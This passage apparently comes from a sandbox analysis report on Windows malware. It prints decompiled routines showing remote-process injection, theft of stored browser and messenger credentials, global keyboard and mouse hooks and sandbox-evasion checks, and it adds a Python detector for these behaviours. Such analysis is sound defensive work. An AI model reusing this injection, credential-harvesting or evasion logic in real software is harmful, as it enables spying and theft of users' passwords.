                                    				_t9 = _t2;
                                    				// __edx (_t11) is the source buffer, __ecx (_t10) its length; _t12 (lpNumberOfBytesWritten) is never assigned
                                    				// in this function, the decompiler shows whatever the register held at the call
                                    				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
                                    				return _t9;
                                    			}

                                    Addresses (one per C-code statement above): 0x00403880, 0x00403881, 0x00403883, 0x00403885, 0x00403892, 0x00403897, 0x0040389e, 0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				void* _t49;
                                    				void* _t52;
                                    				long _t53;
                                    				void* _t55;
                                    				intOrPtr* _t65;
                                    				void* _t68;
                                    				long _t69;
                                    				char* _t80;
                                    				intOrPtr* _t93;
                                    				long _t97;
                                    				intOrPtr* _t100;
                                    				long _t104;
                                    				intOrPtr* _t107;
                                    				long _t111;
                                    				struct HINSTANCE__* _t114;
                                    				struct HINSTANCE__* _t117;
                                    				void* _t120;
                                    				void* _t209;
                                    				void* _t210;
                                    				void* _t211;
                                    				void* _t212;
                                    				void* _t213;
                                    				void* _t216;
                                    				void* _t217;
                                    				void* _t218;
                                    				void* _t219;
                                    				void* _t220;
                                    				void* _t221;
                                    				void* _t222;
                                    				intOrPtr _t229;
                                    				void* _t254;
                                    				void* _t255;
                                    				intOrPtr _t257;
                                    				intOrPtr _t258;
                                    				void* _t270;
                                    
                                    				_t255 = __esi;
                                    				_t254 = __edi;
                                    				_t257 = _t258;
                                    				_t213 = 0xb;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t213 = _t213 - 1;
                                    				} while (_t213 != 0);
                                    				E00403418(0x40bb04);
                                    				_push(_t257);
                                    				_push(0x40c0c4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t258;
                                    				// named-object signalling: 0xb7 == ERROR_ALREADY_EXISTS, so the else branch runs when "_x_X_UPDATE_X_x_" already
                                    				// existed; the handle is closed either way and, in that case, start-up is delayed by 0x2ee0 == 12000 ms
                                    				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    				_t209 = _t49;
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t209); // executed
                                    				} else {
                                    					CloseHandle(_t209);
                                    					Sleep(0x2ee0);
                                    				}
                                    				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    				_t210 = _t52;
                                    				_t53 = GetLastError();
                                    				_t261 = _t53 - 0xb7;
                                    				if(_t53 != 0xb7) {
                                    					CloseHandle(_t210);
                                    					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    					_t211 = _t55;
                                    					__eflags = GetLastError() - 0xb7;
                                    					if(__eflags != 0) {
                                    						CloseHandle(_t211);
                                    						L26:
                                    						E004013A4(1,  &_v80);
                                    						_t225 = "Restart";
                                    						E00401E94(_v80, "Restart");
                                    						if(__eflags != 0) {
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E00404604(_t213, __eflags);
                                    						E0040491C();
                                    						E0040B118(_t225, _t254, _t255);
                                    						// instance gate on the name stored at *0x40d204: on 0xb7 (ERROR_ALREADY_EXISTS) the nested else branches
                                    						// below sleep 0x3e8 == 1000 ms and retry, three times in all, before giving up with ExitProcess(0)
                                    						_t65 =  *0x40d204; // 0x40e8f8
                                    						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
                                    						_t212 = _t68;
                                    						_t69 = GetLastError();
                                    						__eflags = _t69 - 0xb7;
                                    						if(_t69 != 0xb7) {
                                    							CloseHandle(_t212); // executed
                                    						} else {
                                    							CloseHandle(_t212);
                                    							Sleep(0x3e8);
                                    							_t93 =  *0x40d204; // 0x40e8f8
                                    							_t212 = E00403568(0, 0, E00401F48( *_t93));
                                    							_t97 = GetLastError();
                                    							__eflags = _t97 - 0xb7;
                                    							if(_t97 != 0xb7) {
                                    								CloseHandle(_t212);
                                    							} else {
                                    								CloseHandle(_t212);
                                    								Sleep(0x3e8);
                                    								_t100 =  *0x40d204; // 0x40e8f8
                                    								_t212 = E00403568(0, 0, E00401F48( *_t100));
                                    								_t104 = GetLastError();
                                    								__eflags = _t104 - 0xb7;
                                    								if(_t104 != 0xb7) {
                                    									CloseHandle(_t212);
                                    								} else {
                                    									CloseHandle(_t212);
                                    									Sleep(0x3e8);
                                    									_t107 =  *0x40d204; // 0x40e8f8
                                    									_t212 = E00403568(0, 0, E00401F48( *_t107));
                                    									_t111 = GetLastError();
                                    									__eflags = _t111 - 0xb7;
                                    									if(_t111 != 0xb7) {
                                    										CloseHandle(_t212);
                                    									} else {
                                    										ExitProcess(0);
                                    									}
                                    								}
                                    							}
                                    						}
                                    						__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    						if( *((char*)( *0x40d1dc)) != 1) {
                                    							__eflags = 0;
                                    							E004013A4(0, 0x40f1e8);
                                    						} else {
                                    							E004013A4(0,  &_v88);
                                    							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
                                    							E00401B14(0x40f1e8, _v84);
                                    						}
                                    						// the file name "XX--XX--XX.txt" is combined (E00401D58) with the path E00406008 produces and handed to
                                    						// E0040B93C together with the string at *0x40f1e8
                                    						E00406008( &_v92);
                                    						E00401D58( &_v92, "XX--XX--XX.txt");
                                    						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
                                    						_t80 =  *0x40d214; // 0x40e8f4
                                    						__eflags =  *_t80 - 1;
                                    						if(__eflags == 0) {
                                    							E0040B7FC(_t212, _t254, _t255, __eflags);
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E0040B3C0(_t212, _t213, _t254, _t255); // executed
                                    						L43:
                                    						_pop(_t229);
                                    						 *[fs:eax] = _t229;
                                    						_push(0x40c0cb);
                                    						return E00401AE4( &_v92, 0x12);
                                    					}
                                    					CloseHandle(_t211);
                                    					// reached when "_x_X_BLOCKMOUSE_X_x_" already existed: install system-wide (dwThreadId == 0) low-level hooks,
                                    					// 0xd == WH_KEYBOARD_LL and 0xe == WH_MOUSE_LL, with hMod set to the sample's own image base (*0x40e670 == 0x400000)
                                    					// and E0040B0B8 / E0040B108 as the hook procedures
                                    					_t114 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
                                    					_t117 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
                                    					// stay alive while E0040BA84 returns 0, calling E00405918 each round (presumably a message pump, which a
                                    					// low-level hook needs to receive events); afterwards the process exits instead of continuing at L26
                                    					while(1) {
                                    						_t120 = E0040BA84(__eflags);
                                    						__eflags = _t120;
                                    						if(_t120 != 0) {
                                    							break;
                                    						}
                                    						E00405918();
                                    					}
                                    					ExitProcess(0);
                                    					goto L26;
                                    				}
                                    				// password-list mode (reached when "_x_X_PASSWORDLIST_X_x_" already existed): each collector below leaves its
                                    				// result in *0x40f1ec and, if that is non-empty, E00405D70 writes it to a "<name>.abc" file (NOIP, MSN, FIREFOX,
                                    				// IELOGIN, IEPASS, IEAUTO, IEWEB); the names indicate which stored credentials each collector gathers
                                    				CloseHandle(_t210);
                                    				E00409AD4( &_v24, _t210, _t255, _t261);
                                    				E00401B14(0x40f1ec, _v24);
                                    				_t262 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v28);
                                    					E00401D58( &_v28, "NOIP.abc");
                                    					_pop(_t222);
                                    					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
                                    				}
                                    				E00409D28( &_v32, _t210, _t254, _t255);
                                    				_t235 = _v32;
                                    				E00401B14(0x40f1ec, _v32);
                                    				_t263 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "MSN.abc");
                                    					_t235 =  *0x40f1ec;
                                    					_pop(_t221);
                                    					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
                                    				}
                                    				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
                                    				E00401B14(0x40f1ec, _v40);
                                    				_t264 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v44);
                                    					E00401D58( &_v44, "FIREFOX.abc");
                                    					_pop(_t220);
                                    					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
                                    				}
                                    				E00409A84( &_v48);
                                    				E00401B14(0x40f1ec, _v48);
                                    				_t265 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v52);
                                    					E00401D58( &_v52, "IELOGIN.abc");
                                    					_pop(_t219);
                                    					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
                                    				}
                                    				E00409A90( &_v56);
                                    				E00401B14(0x40f1ec, _v56);
                                    				_t266 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v60);
                                    					E00401D58( &_v60, "IEPASS.abc");
                                    					_pop(_t218);
                                    					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
                                    				}
                                    				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
                                    				E00401B14(0x40f1ec, _v64);
                                    				_t267 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v68);
                                    					E00401D58( &_v68, "IEAUTO.abc");
                                    					_pop(_t217);
                                    					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
                                    				}
                                    				E00409AB8( &_v72, _t254, _t255, _t267);
                                    				E00401B14(0x40f1ec, _v72);
                                    				_t268 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v76);
                                    					E00401D58( &_v76, "IEWEB.abc");
                                    					_pop(_t216);
                                    					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
                                    				}
                                    				goto L43;
                                    			}
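The two kinds of routine decompiled above are what a detection engineer keys on: E004037EC and E0040387C call VirtualAllocEx with flAllocationType 0x3000 (MEM_COMMIT | MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE) and then WriteProcessMemory into the returned region, while E0040BBF4 branches on GetLastError() == 0xb7 (ERROR_ALREADY_EXISTS) after creating named objects and installs system-wide hooks with idHook 0xd (WH_KEYBOARD_LL) and 0xe (WH_MOUSE_LL). The Python below is an added example written for this page, not code from the report or from the sample. It parses a constructed API trace and reports those behaviours. The trace line format, the handle values, addresses and sizes, and the CreateMutexA and CreateRemoteThread calls are assumptions for illustration: this section shows only the allocation and write steps, and the thread-creation check is the detector's generalization of the pattern.

```python
import re
from dataclasses import dataclass

# Exact Win32 constants (winnt.h / winuser.h / winerror.h).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
WH_KEYBOARD_LL = 13        # 0xd in the decompiled SetWindowsHookExA call
WH_MOUSE_LL = 14           # 0xe
ERROR_ALREADY_EXISTS = 0xB7

PAGE_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Assumed trace line format (not the sandbox's own): Api(arg, ...) = ret [err=code]
# with hex arguments and "quoted" strings.
CALL_RE = re.compile(r'^(?P<api>\w+)\((?P<args>[^)]*)\)\s*=\s*(?P<ret>[0-9A-Fa-f]+)'
                     r'(?:\s+err=(?P<err>[0-9A-Fa-f]+))?$')


@dataclass
class Call:
    api: str
    args: list
    ret: int
    err: int


def _arg(token):
    token = token.strip()
    if len(token) >= 2 and token[0] == token[-1] == '"':
        return token[1:-1]
    return int(token, 16)


def parse_call(line):
    m = CALL_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable trace line: {line!r}")
    args = [_arg(t) for t in m.group("args").split(",") if t.strip()]
    err = int(m.group("err"), 16) if m.group("err") else 0
    return Call(m.group("api"), args, int(m.group("ret"), 16), err)


def triage(lines):
    """Return (tag, detail) findings for one process's API trace, in trace order."""
    findings = []
    rwx = {}          # (hProcess, base) -> size of remote RWX allocations
    written = set()   # RWX regions that received a WriteProcessMemory
    for c in map(parse_call, lines):
        if c.api == "VirtualAllocEx" and len(c.args) >= 5:
            hproc, _, size, alloc_type, protect = c.args[:5]
            # committed + executable-writable in another process: the sample's exact flag pair
            if alloc_type & MEM_COMMIT and protect == PAGE_EXECUTE_READWRITE:
                rwx[(hproc, c.ret)] = size
                findings.append(("remote_rwx_alloc",
                                 f"hProcess={hproc:#x} base={c.ret:#x} size={size:#x} {PAGE_NAMES[protect]}"))
        elif c.api == "WriteProcessMemory" and len(c.args) >= 2:
            key = (c.args[0], c.args[1])
            if key in rwx:
                written.add(key)
                findings.append(("write_into_remote_rwx", f"hProcess={key[0]:#x} base={key[1]:#x}"))
        elif c.api == "CreateRemoteThread" and len(c.args) >= 4:
            hproc, start = c.args[0], c.args[3]
            for (h, base), size in rwx.items():
                if h == hproc and base <= start < base + size and (h, base) in written:
                    findings.append(("remote_code_injection", f"hProcess={hproc:#x} start={start:#x}"))
        elif c.api == "CreateMutexA" and len(c.args) >= 3 and c.err == ERROR_ALREADY_EXISTS:
            # the object existed before this call: the sample's mode switch
            findings.append(("mutex_already_exists", str(c.args[2])))
        elif c.api == "SetWindowsHookExA" and len(c.args) >= 4:
            id_hook, thread_id = c.args[0], c.args[3]
            if id_hook in (WH_KEYBOARD_LL, WH_MOUSE_LL) and thread_id == 0:
                findings.append(("global_ll_hook",
                                 "WH_KEYBOARD_LL" if id_hook == WH_KEYBOARD_LL else "WH_MOUSE_LL"))
    return findings


# Constructed trace: hook ids, hook procedures and hMod mirror E0040BBF4 and the allocation
# flags mirror E0040387C; handles, addresses, sizes and the mutex/thread calls are made up.
SAMPLE_TRACE = [
    'CreateMutexA(00000000, 00000000, "_x_X_BLOCKMOUSE_X_x_") = 000000A8 err=000000B7',
    'SetWindowsHookExA(0000000D, 0040B0B8, 00400000, 00000000) = 00010203',
    'SetWindowsHookExA(0000000E, 0040B108, 00400000, 00000000) = 00010205',
    'VirtualAllocEx(000000F4, 00000000, 00000401, 00003000, 00000040) = 00620000',
    'WriteProcessMemory(000000F4, 00620000, 0019F200, 00000401, 0019F1F0) = 00000001',
    'CreateRemoteThread(000000F4, 00000000, 00000000, 00620000, 00000000, 00000000, 00000000) = 000000FC',
]

if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_TRACE):
        print(f"{tag:24} {detail}")
```

The flProtect test is deliberately strict: a PAGE_READWRITE remote allocation followed by a write is how legitimate loaders and debuggers behave and produces no finding, whereas the sample's 0x40 does. The hook check requires dwThreadId == 0, matching what the decompiled call passes, so a thread-scoped hook is not reported.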

                                    Addresses (one per C-code statement above, continued below):
                                    0x0040bbf4, 0x0040bbf4, 0x0040bbf5, 0x0040bbf7, 0x0040bbfc, 0x0040bbfc, 0x0040bbfe, 0x0040bc00, 0x0040bc00, 0x0040bc09,
                                    0x0040bc10, 0x0040bc11, 0x0040bc16, 0x0040bc19, 0x0040bc25, 0x0040bc2a, 0x0040bc36, 0x0040bc4b, 0x0040bc38, 0x0040bc39,
                                    0x0040bc43, 0x0040bc43, 0x0040bc59, 0x0040bc5e, 0x0040bc60, 0x0040bc65, 0x0040bc6a, 0x0040be9b, 0x0040bea9, 0x0040beae,
                                    0x0040beb5, 0x0040beba, 0x0040bf06, 0x0040bf0b, 0x0040bf13, 0x0040bf1b, 0x0040bf20, 0x0040bf25, 0x0040bf2c, 0x0040bf2c,
                                    0x0040bf31, 0x0040bf36, 0x0040bf3b, 0x0040bf40, 0x0040bf51, 0x0040bf56, 0x0040bf58, 0x0040bf5d, 0x0040bf62, 0x0040c02a,
                                    0x0040bf68, 0x0040bf69, 0x0040bf73, 0x0040bf78, 0x0040bf8e, 0x0040bf90, 0x0040bf95, 0x0040bf9a, 0x0040c022, 0x0040bfa0,
                                    0x0040bfa1, 0x0040bfab, 0x0040bfb0, 0x0040bfc6, 0x0040bfc8, 0x0040bfcd, 0x0040bfd2, 0x0040c01a, 0x0040bfd4, 0x0040bfd5,
                                    0x0040bfdf, 0x0040bfe4, 0x0040bffa, 0x0040bffc, 0x0040c001, 0x0040c006, 0x0040c012, 0x0040c008, 0x0040c00a, 0x0040c00a,
                                    0x0040c006, 0x0040bfd2, 0x0040bf9a, 0x0040c034, 0x0040c037, 0x0040c062, 0x0040c064, 0x0040c039, 0x0040c03e, 0x0040c049,
                                    0x0040c056, 0x0040c056, 0x0040c06c, 0x0040c079, 0x0040c086, 0x0040c08b, 0x0040c090, 0x0040c093, 0x0040c095, 0x0040c09f,
                                    0x0040c09f, 0x0040c0a4, 0x0040c0a9, 0x0040c0ab, 0x0040c0ae, 0x0040c0b1, 0x0040c0c3, 0x0040c0c3, 0x0040bebd, 0x0040bec4,
                                    0x0040bed2, 0x0040bed9, 0x0040bee7, 0x0040bef3,
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                     			// Anti-analysis gate (decompiler output, comments added): each byte at
                                     			// 0x40e8e0..0x40e8eb is a config flag that enables one check, and any
                                     			// check that returns 1 terminates the process with ExitProcess(0).
                                     			E0040B118(void* __edx, void* __edi, void* __esi) {
                                    				void* __ebx;
                                    				char* _t1;
                                    				char* _t2;
                                    				char* _t3;
                                    				char* _t4;
                                    				char* _t5;
                                    				char* _t6;
                                    				char* _t7;
                                    				char* _t8;
                                    				char* _t9;
                                    				char* _t10;
                                    				char* _t11;
                                    				char* _t12;
                                    				char* _t13;
                                    				long _t15;
                                    				void* _t49;
                                    				long _t58;
                                    				void* _t62;
                                    				void* _t63;
                                    				intOrPtr* _t64;
                                    
                                    				_t63 = __esi;
                                    				_t62 = __edi;
                                     				_t1 =  *0x40d1d4; // 0x40e8e0
                                     				if( *_t1 == 1 && E004052EC() == 1) { // E004052EC calls GetModuleHandleA("SbieDll.dll"): Sandboxie present?
                                     					ExitProcess(0);
                                     				}
                                    				_t2 =  *0x40d1b0; // 0x40e8e1
                                    				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t3 =  *0x40d1fc; // 0x40e8e2
                                    				if( *_t3 == 1 && E00405124() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t4 =  *0x40d1ac; // 0x40e8e3
                                    				_t71 =  *_t4 - 1;
                                    				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t5 =  *0x40d1f4; // 0x40e8e4
                                    				if( *_t5 == 1 && E00405310() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t6 =  *0x40d1c8; // 0x40e8e5
                                    				if( *_t6 == 1 && E004054A4() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t7 =  *0x40d1d0; // 0x40e8e6
                                    				if( *_t7 == 1 && E004053EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t8 =  *0x40d1c0; // 0x40e8e7
